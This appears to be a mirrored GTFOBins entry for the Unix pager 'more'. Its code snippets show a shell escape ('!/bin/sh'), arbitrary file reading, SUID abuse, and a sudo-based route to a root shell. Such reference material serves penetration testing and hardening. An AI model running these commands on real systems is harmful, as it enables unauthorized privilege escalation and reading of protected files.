mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
16 lines
287 B
Markdown
16 lines
287 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
TERM= more /etc/profile
|
|
!/bin/sh
|
|
file-read:
|
|
- code: more file_to_read
|
|
suid-enabled:
|
|
- code: "./more file_to_read\n"
|
|
sudo-enabled:
|
|
- code: |
|
|
TERM= sudo -E more /etc/profile
|
|
!/bin/sh
|
|
---
|